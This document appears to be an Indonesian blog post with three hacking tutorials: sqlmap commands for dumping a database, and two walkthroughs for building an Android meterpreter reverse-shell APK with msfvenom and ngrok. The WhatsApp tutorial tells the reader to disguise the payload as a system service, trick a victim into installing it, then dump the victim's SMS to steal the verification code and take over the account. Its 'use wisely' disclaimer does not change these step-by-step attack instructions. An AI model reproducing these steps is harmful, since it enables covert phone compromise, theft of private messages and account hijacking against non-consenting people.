Cara menggunakan SQL map

 

Sqlmap is an open source penetration testing tool that automates the proceses of detecting and exploting SQL injection flaws and taking over of database server...

Support to enumerate users, password hashes, privileges roles, databases, tables and columns

( Sqlmap adalah alat pengujian penetrasi open source yang mengotomatiskan proses mendeteksi dan mengeksploitasi kekurangan injeksi SQL dan mengambil alih server database...

Dukungan untuk menghitung pengguna, hash kata sandi, peran hak istimewa, database, tabel dan kolom )

Perintah-perintah dasar sqlmap untuk melakukan sql injection

-u ( fungsi nya untuk memanggil url yang kalian inject )
--dbs ( untuk melihat list database yang terdapat pada web target )

-D ( untuk memilih suatu database untuk ditampilkan )
--tables ( untuk melihat list tabel pada database yang di pilih )

-T ( untuk memilih tabel pada list tabel yang berhasil di tampilkan )
--columns ( untuk menampilkan list kolom pada tabel yang di pilih )

-C ( untuk memilih kolom pada list kolom yang berhasil di tampilkan )
--dump ( untuk melihat isi dari suatu kolom atau tabel juga bisa )

Command are here :

$ cd sqlmap

$ python2 sqlmap.py

$ python2 sqlmap.py

Dan ini hanya contoh web nya okey...

$ python2 sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs

$ python2 sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D database_name --tables

$ python2 sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D database_name -T table_name --columns

$ python2 sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D database_name -T table_name -C columns_name --dump

Done.

Cara hack WhatsApp tanpa sentuh hp si korban

 

Bahan-bahan nya yang kita perlukan adalah :

- termux yang sudah terinstall metasploit & ngrok,ngrok gunanya supaya lhost nya tidak berubah-ubah

- apk editor
- file manager
- apk kloningan wa atau download wa mod jga bisa untuk kita jadiin wa si target nya
- apk wifi kill atau apk lain ya apk nya kita buat sendiri aja untuk bohongin atau untuk mengelabuhi si target

Pertama-tama buka termux lalu kita buat dulu virus.apk nya dengan mengetik an :

( Session1 )
$ msfvenom -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=16096 R > service.apk

Untuk mencari lport & lhost nya kita gunakan ngrok bisa juga sih kita pakai serveo tapi disini saya menggunakan ngrok buka ngrok di ( session 2 ) dengan mengetikan

(Session2)
$ ngrok tcp 1234/./ngrok http 8080

Kalau belum terconnect kalian hidupkan saja hotspot nya kemudian keluar lalu masuk lagi ke ngrok nya

Kalau sudah kita tunggu sampai selesai payload yang sudah kita buat tadi

Setelah itu kita buka session baru saja ketikan

Kita update & upgrade dulu

$ apt update && apt upgrade

$ ls

Kemudian kita izin kan untuk penyimpanan termux nya
$ termux-setup-storage

Kemudian kita pindahkan apk nya ke sdcard dengan mengetik an

$ mv (nama.apk) /sdcard

Terus kita cek lagi apakah apk nya sudah terpindahkan ketikan saja

$ ls

Oke setelah itu kita jalankan metasploit nya

$ msfconsole

Selagi membuka msfconsole nya kita edit dulu apk nya
Buka apk editor lalu kita pilih apk nya kemudian kita ubah (package name) ya contoh nya jadiin com.service.stage dan kita ubah nama apk nya jadiin (service root) nya biar si target gak curiga kemudian kita save

terus kita buka file manager cari apk yang kita buat dan save terus kita ubah nama nya jadi (service Root apk)

Setelah itu kita masuk ke termux dan metasploit nya

Kita setting dulu metasploit nya

msf5 > use multi/handler

msf5 > set payload android/meterpreter/reverse_tcp

Kita buka opstion dulu kita ubah lhost dan lport nya dengan mengetik an :

msf5 > show options

Kita liat lhost nya belum ada kan kita set kita bisa pakai dari ngrok tapi rekomendasi dari aku sih pakai lhost yang ini aja 0.0.0.0

msf5 > set LHOST 0.0.0.0

Sementara untuk lport nya untuk set yang disini tidak boleh sembarang kita ambil dari ngrok nya

msf5 > set LPORT 1234

Kita cek lagi apakah sudah ada

msf5 > show options

Jika sudah benar kita run

msf5 > run

Kemudian kita cari target dan cari lah cara agar si target menginstall apk yang kita sudah buat tadi kirim ke target apk nya suruh dia install yakin kan si target bahwa apk yang kita krim aman buat di install

Kalau sudah yakin si target menginstall apk nya kita salin no wa dia

Lalu kita pastekan di wa kloningan/wa mod yang sudah ada di hp kita

Kemudian kita suruh si target membuka apk nya dan cek di termux nya apakah sudah terhubung ke hp si target nya klo sudah terhubung
Maka tulisan msf5 nya akan menjadi (meterpreter) jika sudah terhubung ke hp korban

meterpreter >

kita daftarkan no wa si target di wa kloningan/mod yang sudah kita sediakan sebelum nya dan di saat itu wa nya akan meminta kode verifikasi dari no si target yang kita daftar kan dan kode tersebut akan terkirim ke hp si korban cara untuk mendapatkan kode tersebut adalah kita buka termux lalu ketikan di metasploit nya dump_sms

Pastikan metasploit nya sudah benar-benar terhubung ke hp si target kemudian ketikan :

meterpreter > dump_sms

Jika hasil nya sudah ada kita copy lalu kita buka session baru saja juga bisa

(Session3)
Ketikan saja

$ ls

Setelah Kita copy dump sms nya
Jika belum menginstall nano install dulu dengan mengetikan :

$ pkg install nano

Kemudian untuk melihat isi sms nya kita ketikan saja

$ nano ( pastekan dump_sms....txt disini yang kita copy tadi )

Kita bisa juga melihat sms nya menggunakan bantuan aplikasi lain

Dan perbesar lihat kode verifikasi nya dan setelah itu kita copy kode nya lalu kita keluar dari termux dan masuk kembali ke apk wa mod/apk wa kloningan tadi yang sudah kita daftarkan no si target lalu tinggal kita pastekan deh kode verifikasi wa nya
Tinggal kita ganti/biarkan saja nama wa nya

Dan lihat hasil nya apabila berhasil maka isi chat si target akan dapat kita lihat

mission succes...

Catatan :
- Gunakan lah dengan bijak dan dengan sebaik-baik nya
- jangan di salah gunakan
- kerusakan apapun yang kalian perbuat tidak menjadi tanggung jawab kami

Done.

Cara menggunakan metasploit framework di Termux

  Pertama-tama kita update dan upgrade dulu seperti biasa nya kemudian setelah itu kita jalan kan  metasploit nya di halaman ( session 1 ) dengan mengetikan :

$ msfconsole

Lalu buka session baru ( session 2 ) untuk kita membuat payload nya
Ketikan saja :

$ msfvenom -p android/meterpreter/reverse_tcp LHOST=( ip kalian ) LPORT=( terserah kalian ) -o /sdcard/(nama paylod/apk virusnya).apk

Contoh jadi seperti ini :

$ msfvenom -p android/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -o /sdcard/backdoor.apk

Untuk mencari lhost bisa cari di ( session 3 ) kemudian ketikan ifconfig lalu cari ip kalian klau ingin lebih aman lagi kita bisa buka ngrok lalu kita copy ngrok kita kemudian ketikan seperti ini

$ ifconfig ( pastekan ngrok kita )
Lalu kita copy ip dari hasil ifconfig ngrok itu

Kita tunggu hasil dari pembuatan paylod/virus yang  kita buat tadi kita lihat apakan metasploit nya sudah masuk kita set dulu msfconsole nya okeh
Kita balik ke session 1

Cara set lhost & lport nya hanya contoh  :

Msf5 > use exploit/multi/handler

Msf5  ..................... > Set payload android/meterpreter/reverse_tcp

Msf5 ...................... > Set lhost 127.0.0.1

Msf5 ...................... > Set lport 4444

Jika sudah jangan di run/exploit dulu kita lihat apakah apk payload yg kita sudah jadi jika sudah jadi kita buka file manager hp kita terus kita cari apk payload nya 

kemudian kita kirim payload/virus tersebut ke target kita ya tentu nya bisa dengan banyak cara agar target kita percaya bahwa apk yg kita kirim aman dan pastikan si target menginstall dan membuka payload nya baru kita run/exploit

( session1 )

Msf5 ...................... > run

Jika sudah muncul tulisan meterpreter berarti kita sudah terhubung dengan hp si target dan bisa mengeksploit atau meremote hp si target...

Kalau sudah terhubung maka tulisan nya akan jadi seperti ini 👇

Meterpreter >





Catatan :

- Gunakan sebaik-baiknya dan jangan di salah gunakan 

- metasploit juga bisa di gunakan untuk meremote komputer, laptop,dll

- bisa digunakan sebagai penetrasion testing

- dan masih banyak lagi kegunaan yang bisa dilakukan metasploit ini

Done.